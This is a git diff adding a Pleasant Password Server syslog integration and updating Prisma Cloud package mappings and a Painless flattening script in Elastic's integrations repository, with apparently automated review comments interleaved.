+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/pps/data_stream/log/sample_event.json b/packages/pps/data_stream/log/sample_event.json
new file mode 100644
index 00000000000..e333d5f8946
--- /dev/null
+++ b/packages/pps/data_stream/log/sample_event.json
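Review bot: The three `tz_offset` descriptions end with `from UCT`, which should read `from UTC`; the logfile and tcp copies sit earlier in this hunk and the udp copy here, and since the sentence is duplicated verbatim it is worth fixing all three at once. The same description offers `-05:00` as the example differential while test-udp-tz-config.yml uses `+0500`; both forms are accepted by the date processor, but naming the compact form too would spare users a guess. The `tz_offset` variable is `required: true` with `default: local`, so the description should also say that `local` is the value to keep when no override is wanted.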
@@ -0,0 +1,60 @@ +{ + "@timestamp": "2024-01-23T09:49:10.000+05:00", + "agent": { + "ephemeral_id": "4839a553-f2b3-4b50-8473-50087ad56a7c", + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.0.0" + }, + "client": { + "ip": "192.168.1.2" + }, + "data_stream": { + "dataset": "pps.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "snapshot": false, + "version": "8.0.0" + }, + "event": { + "agent_id_status": "verified", + "created": "2024-01-23T09:49:10.000+05:00", + "dataset": "pps.log", + "ingested": "2024-01-23T22:18:43Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success", + "timezone": "+0500" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "172.24.0.7:44613" + }, + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event", + "forwarded", + "pps-log" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } +} \ No newline at end of file diff --git a/packages/pps/docs/README.md b/packages/pps/docs/README.md new file mode 100644 index 00000000000..0276d532ab7 --- /dev/null +++ b/packages/pps/docs/README.md 
@@ -0,0 +1,129 @@ +# Pleasant Password Server + +The Pleasant Password Server integration collects and parses DNS, DHCP, and Audit data collected from [Pleasant Password Server](https://pleasantpasswords.com/) via TCP/UDP or logfile. + +## Setup steps +1. Enable the integration with TCP/UDP input. +2. Log in to the PPS WebUI. +3. Configure the PPS to send messages to a Syslog server using the following steps. + 1. From the Menu go to Logging -> Syslog Configuration + 2. Set the Syslog Configuration to Enabled + 3. Set Hostname to the Hostname of your Fleet Agent or Load Balancer + 4. Set the Correct Port used in the Integration Configuration + 5. Set UDP or TCP + 6. Optionally set the Facility + +## Compatibility + +This module has been tested against `Pleasant Password Server Version 7.11.44.0 `. +It should however work with all versions. + +## Log samples +Below are the samples logs of the respective category: + +## Audit Logs: +``` +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity 
Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 +``` + +## Logs + +This is the `log` dataset. + +An example event for `log` looks as following: + +```json +{ + "@timestamp": "2024-01-23T09:49:10.000+05:00", + "agent": { + "ephemeral_id": "4839a553-f2b3-4b50-8473-50087ad56a7c", + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.0.0" + }, + "client": { + "ip": "192.168.1.2" + }, + "data_stream": { + "dataset": "pps.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "fb476fe0-ec94-4731-9642-3d09807f2a87", + "snapshot": false, + "version": "8.0.0" + }, + "event": { + "agent_id_status": "verified", + "created": "2024-01-23T09:49:10.000+05:00", + "dataset": "pps.log", + "ingested": "2024-01-23T22:18:43Z", + "original": "<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "outcome": "success", + "timezone": "+0500" + }, + "host": { + "hostname": "SRV-PPS-001" + }, + "input": { + "type": "udp" + }, + "log": { + "source": 
{ + "address": "172.24.0.7:44613" + }, + "syslog": { + "priority": 134 + } + }, + "message": "Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr\t127.0.0.1\t23/01 09:49:10.894\t", + "tags": [ + "preserve_original_event", + "forwarded", + "pps-log" + ], + "user": { + "domain": "name.test", + "email": "user@name.test", + "name": "user" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. 
| keyword | +| input.type | Input type | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.offset | Log offset | long | +| log.source.address | Log source address | keyword | +| log.syslog.priority | Syslog numeric priority of the event, if available. According to RFCs 5424 and 3164, the priority is 8 \* facility + severity. This number is therefore expected to contain a value between 0 and 191. | long | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + diff --git a/packages/pps/img/logo.svg b/packages/pps/img/logo.svg new file mode 100644 index 00000000000..7ba8efcbb77 --- /dev/null +++ b/packages/pps/img/logo.svg @@ -0,0 +1,28 @@ + + + + + + diff --git a/packages/pps/manifest.yml b/packages/pps/manifest.yml new file mode 100644 index 00000000000..9b9c66d40e4 --- /dev/null +++ b/packages/pps/manifest.yml 
@@ -0,0 +1,109 @@
+format_version: 3.0.3
+name: pps
+title: "Pleasant Password Server"
+version: 0.0.1
+source:
+ license: "Apache-2.0"
+description: "Integration for Pleasant Password Server Syslog Messages"
+type: integration
+categories:
+ - custom
+ - productivity
+ - security
+conditions:
+ kibana:
+ version: "^8.0.0"
+ elastic:
+ subscription: "basic"
+icons:
+ - src: /img/logo.svg
+ title: PPS logo
+ size: 32x32
+ type: image/svg+xml
+policy_templates:
+ - name: Pleasant Password Server
+ title: Pleasant Password Server logs
+ description: Collect Pleasant Password Server logs.
+ inputs:
+ - type: logfile
+ vars:
+ - name: paths
+ type: text
+ title: Paths
+ multi: true
+ required: true
+ show_user: true
+ title: Collect logs from Pleasant Password Server via File input
+ description: Collecting syslog from Pleasant Password Server via File input.
+ - type: tcp
+ vars:
+ - name: listen_address
+ type: text
+ title: Listen Address
+ description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces.
+ multi: false
+ required: true
+ show_user: true
+ default: localhost
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The TCP port number to listen on.
+ multi: false
+ required: true
+ show_user: true
+ default: 9037
+ - name: ssl
+ type: yaml
+ title: SSL Configuration
+ description: i.e. certificate_authorities, supported_protocols, verification_mode etc.
+ multi: false
+ required: false
+ show_user: false
+ default: |
+ #certificate_authorities:
+ # - |
+ # -----BEGIN CERTIFICATE-----
+ # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF
+ # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2
+ # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB
+ # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n
+ # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl
+ # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t
+ # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP
+ # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41
+ # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O
+ # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux
+ # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D
+ # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw
+ # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA
+ # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu
+ # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0
+ # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk
+ # sxSmbIUfc2SGJGCJD4I=
+ # -----END CERTIFICATE-----
+ title: Collect logs from Pleasant Password Server via TCP input
+ description: Collecting logs from Pleasant Password Server via TCP input.
+ - type: udp
+ vars:
+ - name: listen_address
+ type: text
+ title: Listen Address
+ description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces.
+ multi: false
+ required: true
+ show_user: true
+ default: localhost
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The UDP port number to listen on.
+ multi: false + required: true + show_user: true + default: 9038 + title: Collect logs from Pleasant Password Server via UDP input + description: Collecting syslog from Pleasant Password Server via UDP input. +owner: + github: elastic/security-service-integrations + type: community diff --git a/packages/prisma_cloud/changelog.yml b/packages/prisma_cloud/changelog.yml index 541ac657f79..20167de590b 100644 --- a/packages/prisma_cloud/changelog.yml +++ b/packages/prisma_cloud/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9517 +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/prisma_cloud/data_stream/alert/fields/fields.yml b/packages/prisma_cloud/data_stream/alert/fields/fields.yml index 73ef5344d0c..2e097ebbe8a 100644 --- a/packages/prisma_cloud/data_stream/alert/fields/fields.yml +++ b/packages/prisma_cloud/data_stream/alert/fields/fields.yml @@ -296,6 +296,8 @@ fields: - name: id type: keyword + - name: compliance_id + type: keyword - name: custom_assigned type: boolean - name: policy diff --git a/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json b/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json index 6dfb45f582e..c9605adb0c4 100644 --- a/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json +++ b/packages/prisma_cloud/data_stream/host/_dev/test/pipeline/test-host.log-expected.json 
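Review bot: `owner.type: community` contradicts `owner.github: elastic/security-service-integrations` at the end of this hunk; the package spec distinguishes `elastic`, `partner` and `community` owners, so if the Elastic team owns the package the type should be `elastic`, otherwise the GitHub owner should be the community maintainer. `policy_templates[0].name: Pleasant Password Server` contains spaces whereas policy template names are usually short identifiers (the package itself is `pps`); I am not certain the spec rejects it, but aligning it avoids surprises in policy references. Defaulting `listen_address` to `localhost` for both TCP and UDP is the right choice; since the `ssl` default is only a commented example, the TCP description could state plainly that syslog over TCP is cleartext until that block is filled in.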
@@ -149,13 +149,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -334,13 +332,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -499,13 +495,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -622,13 +616,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", @@ -890,13 +882,11 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI", - "HIPAA", - "NIST SP 800-190", - "GDPR", - "DISA STIG" - ] + "DISA STIG", + "GDPR", + "HIPAA", + "NIST SP 800-190", + "PCI" ], "text": "string", "title": "string", diff --git a/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml index 485becc4a7f..66fa48b29c0 100644 --- a/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml +++ b/packages/prisma_cloud/data_stream/host/elasticsearch/ingest_pipeline/default.yml 
@@ -4115,6 +4115,74 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + + - script: + description: Flatten arrays of arrays. + tag: flatten_array + lang: painless + source: | + def flatten(def aa) { + if (!(aa instanceof List)) { + if (aa instanceof String) { + return aa; + } + return null; + } + if (aa.length == 1) { + // Ensure lexical ordering is consistent between single array optimisation and full set extraction. + Collections.sort(aa[0]); + return aa[0]; + } + def set = new HashSet(); + for (def a: aa) { + for (def e: a) { + set.add(e); + } + } + def list = new ArrayList(); + for (def e: set) { + list.add(e); + } + Collections.sort(list); + return list; + } + + if (ctx.prisma_cloud?.host?.all_compliance?.data != null) { + for (int i; i < ctx.prisma_cloud.host.all_compliance.data.length; i++) { + ctx.prisma_cloud.host.all_compliance.data[i].templates = flatten(ctx.prisma_cloud.host.all_compliance.data[i].templates); + } + } + if (ctx.prisma_cloud?.host?.compliance_issues?.data != null) { + for (int i; i < ctx.prisma_cloud.host.compliance_issues.data.length; i++) { + ctx.prisma_cloud.host.compliance_issues.data[i].templates = flatten(ctx.prisma_cloud.host.compliance_issues.data[i].templates); + } + } + if (ctx.prisma_cloud?.host?.history != null) { + for (int i; i < ctx.prisma_cloud.host.history.length; i++) { + if (ctx.prisma_cloud.host.history[i].vulnerabilities == null) { + continue; + } + for (int j; j < ctx.prisma_cloud.host.history[i].vulnerabilities.length; j++) { + ctx.prisma_cloud.host.history[i].vulnerabilities[j].templates = flatten(ctx.prisma_cloud.host.history[i].vulnerabilities[j].templates); + } + } + } + if (ctx.prisma_cloud?.host?.image?.history != null) { + for (int i; i < ctx.prisma_cloud.host.image.history.length; i++) { + if 
(ctx.prisma_cloud.host.image.history[i].vulnerabilities == null) { + continue; + } + for (int j; j < ctx.prisma_cloud.host.image.history[i].vulnerabilities.length; j++) { + ctx.prisma_cloud.host.image.history[i].vulnerabilities[j].templates = flatten(ctx.prisma_cloud.host.image.history[i].vulnerabilities[j].templates); + } + } + } + if (ctx.prisma_cloud?.host?.vulnerabilities?.data != null) { + for (int i; i < ctx.prisma_cloud.host.vulnerabilities.data.length; i++) { + ctx.prisma_cloud.host.vulnerabilities.data[i].templates = flatten(ctx.prisma_cloud.host.vulnerabilities.data[i].templates); + } + } + - remove: field: - json diff --git a/packages/prisma_cloud/data_stream/host/fields/fields.yml b/packages/prisma_cloud/data_stream/host/fields/fields.yml index 38997b03d3b..16b11842fc7 100644 --- a/packages/prisma_cloud/data_stream/host/fields/fields.yml +++ b/packages/prisma_cloud/data_stream/host/fields/fields.yml @@ -398,6 +398,9 @@ - name: status type: keyword description: Vendor status for the vulnerability. + - name: templates + type: keyword + description: List of templates with which the vulnerability is associated. - name: text type: keyword description: Description of the violation. @@ -425,7 +428,7 @@ - name: name type: keyword description: Name of the tag. - - name: wildfire_malware + - name: wild_fire_malware type: group fields: - name: md5 @@ -740,7 +743,7 @@ - name: applicable_rules type: keyword description: Rules applied on the package. - - name: binaryPkgs + - name: binary_pkgs type: keyword description: Names of the distro binary package names (packages which are built from the source of the package). - name: block @@ -1322,6 +1325,9 @@ - name: kind type: keyword description: ExploitKind represents the kind of the exploit. + - name: link + type: keyword + description: Link is a link to information about the exploit. - name: source type: keyword description: ExploitType represents the source of an exploit. 
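Review bot: `flatten` in the new `flatten_array` script assumes every element of `aa` is itself a list: the `aa.length == 1` branch calls `Collections.sort(aa[0])` and the general branch iterates `for (def e: a)`, so an already-flat list such as `["PCI", "HIPAA"]` (the very shape `templates` is now declared as in fields.yml) would raise a script error and, with no `ignore_failure` on the processor, send the document to the pipeline-level `on_failure`. Handling both nested and flat elements inside one loop, as below, removes the special case and the failure mode; note it also de-duplicates the single-list case, which the general path already does. The counters `for (int i; i < …; i++)` rely on Painless default-initialising `i` to zero; `int i = 0` reads unambiguously. The enclosing `processors` list starts before this hunk.
```painless
def flatten(def aa) {
  if (!(aa instanceof List)) {
    return aa instanceof String ? aa : null;
  }
  def set = new HashSet();
  for (def a: aa) {
    if (a instanceof List) {
      set.addAll(a);
    } else if (a != null) {
      set.add(a);
    }
  }
  def list = new ArrayList(set);
  Collections.sort(list);
  return list;
}
// … unchanged: the per-field calls to flatten() on all_compliance, compliance_issues, history, image.history and vulnerabilities …
```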
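Review bot: Renaming the mapped names `wildfire_malware` to `wild_fire_malware` in the `@@ -425,7 +428,7 @@` hunk and `binaryPkgs` to `binary_pkgs` in the `@@ -740,7 +743,7 @@` hunk only changes the mapping: if the ingest pipeline still emits the old names the data lands unmapped, and if it already emits the new ones (which the snake_case form suggests) the change is a mapping fix whose effect on existing indices should be called out. I cannot see the pipeline's rename or script step from here, so please confirm which case applies and, for a published package, state the field rename in the changelog so saved searches on the old names can be updated.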
diff --git a/packages/prisma_cloud/data_stream/host/sample_event.json b/packages/prisma_cloud/data_stream/host/sample_event.json index cb4d6bcca9f..0767ddb9c23 100644 --- a/packages/prisma_cloud/data_stream/host/sample_event.json +++ b/packages/prisma_cloud/data_stream/host/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-11-03T06:33:54.250Z", + "@timestamp": "2024-04-03T23:20:14.863Z", "agent": { - "ephemeral_id": "64d561d9-fd72-4f78-b68c-87702b5c3493", - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "ephemeral_id": "a2e1faf9-a21e-4a2e-a964-e756be243ce0", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "cloud": { "account": { @@ -32,9 +32,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", 
@@ -43,7 +43,7 @@ ], "dataset": "prisma_cloud.host", "id": "DESKTOP-6PQXXMS", - "ingested": "2023-11-03T06:33:55Z", + "ingested": "2024-04-03T23:20:24Z", "kind": "event", "original": "{\"_id\":\"DESKTOP-6PQXXMS\",\"binaries\":[{\"altered\":true,\"cveCount\":0,\"deps\":[\"string\"],\"fileMode\":0,\"functionLayer\":\"string\",\"md5\":\"string\",\"missingPkg\":true,\"name\":\"string\",\"path\":\"string\",\"pkgRootDir\":\"string\",\"services\":[\"string\"],\"version\":\"string\"}],\"cloudMetadata\":{\"accountID\":\"Non-onboarded cloud accounts\",\"awsExecutionEnv\":\"string\",\"image\":\"string\",\"labels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"name\":\"string\",\"provider\":[\"aws\"],\"region\":\"string\",\"resourceID\":\"string\",\"resourceURL\":\"string\",\"type\":\"string\",\"vmID\":\"string\",\"vmImageID\":\"string\"},\"type\":\"host\",\"hostname\":\"DESKTOP-6PQXXMS\",\"scanTime\":\"2023-08-23T11:48:41.803Z\",\"Secrets\":[],\"osDistro\":\"windows\",\"osDistroVersion\":\"string\",\"osDistroRelease\":\"Windows\",\"distro\":\"Microsoft Windows [Version 
10.0.19045.2006]\",\"packageManager\":true,\"packages\":[{\"pkgs\":[{\"binaryIdx\":[0],\"binaryPkgs\":[\"string\"],\"cveCount\":0,\"defaultGem\":true,\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"functionLayer\":\"string\",\"goPkg\":true,\"jarIdentifier\":\"string\",\"layerTime\":0,\"license\":\"string\",\"name\":\"string\",\"osPackage\":true,\"path\":\"string\",\"version\":\"string\"}],\"pkgsType\":\"nodejs\"}],\"isARM64\":false,\"packageCorrelationDone\":true,\"redHatNonRPMImage\":false,\"image\":{\"created\":\"0001-01-01T00:00:00Z\",\"entrypoint\":[\"string\"],\"env\":[\"string\"],\"healthcheck\":true,\"id\":\"string\",\"labels\":{},\"layers\":[\"string\"],\"os\":\"string\",\"repoDigest\":[\"string\"],\"repoTags\":[\"string\"],\"user\":\"string\",\"workingDir\":\"string\"},\"allCompliance\":{\"compliance\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.949Z\",\"exploit\":[\"exploit-db\"],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}],\"enabled\":\"true\"},\"clusters\":[\"string\"],\"repoTag\":null,\"tags\":[{\"digest\":\"string\",\"id\":\"string\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"trustResult\":{\"hostsStatuses\":[{\"host\":\"string\",\"status\":\"trusted\"}]},\"repoDigests\":[],\"creationTi
me\":\"0001-01-01T00:00:00Z\",\"pushTime\":\"0001-01-01T00:00:00Z\",\"vulnerabilitiesCount\":0,\"complianceIssuesCount\":4,\"vulnerabilityDistribution\":{\"critical\":0,\"high\":0,\"medium\":0,\"low\":0,\"total\":0},\"complianceDistribution\":{\"critical\":4,\"high\":0,\"medium\":0,\"low\":0,\"total\":4},\"vulnerabilityRiskScore\":0,\"complianceRiskScore\":4000000,\"riskFactors\":{},\"firstScanTime\":\"2023-08-11T06:53:57.456Z\",\"history\":[{\"baseLayer\":true,\"created\":0,\"emptyLayer\":true,\"id\":\"string\",\"instruction\":\"string\",\"sizeBytes\":0,\"tags\":[\"string\"],\"vulnerabilities\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.950Z\",\"exploit\":[\"exploit-db\"],\"exploits\":[{\"kind\":[\"poc\",\"in-the-wild\"],\"link\":\"string\",\"source\":[\"\",\"exploit-db\"]}],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}]}],\"hostDevices\":[{\"ip\":\"0.0.0.0\",\"name\":\"string\"}],\"hosts\":{},\"id\":\"string\",\"err\":\"\",\"collections\":[\"All\"],\"instances\":[{\"host\":\"string\",\"image\":\"string\",\"modified\":\"2023-09-08T04:01:49.951Z\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"scanID\":0,\"trustStatus\":\"\",\"externalLabels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:
49.949Z\",\"value\":\"string\"}],\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"firewallProtection\":{\"enabled\":false,\"supported\":false,\"outOfBandMode\":\"Observation\",\"ports\":[0],\"tlsPorts\":[0],\"unprotectedProcesses\":[{\"port\":0,\"process\":\"string\",\"tls\":true}]},\"applications\":[{\"installedFromPackage\":true,\"knownVulnerabilities\":0,\"layerTime\":0,\"name\":\"string\",\"path\":\"string\",\"service\":true,\"version\":\"string\"}],\"appEmbedded\":false,\"wildFireUsage\":null,\"agentless\":false,\"malwareAnalyzedTime\":\"0001-01-01T00:00:00Z\"}", "start": "0001-01-01T00:00:00.000Z", @@ -75,11 +75,11 @@ "type": "host" }, "input": { - "type": "udp" + "type": "tcp" }, "log": { "source": { - "address": "192.168.243.5:34718" + "address": "172.18.0.4:60388" } }, "os": { @@ -143,9 +143,7 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", @@ -356,9 +354,7 @@ "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", diff --git a/packages/prisma_cloud/docs/README.md 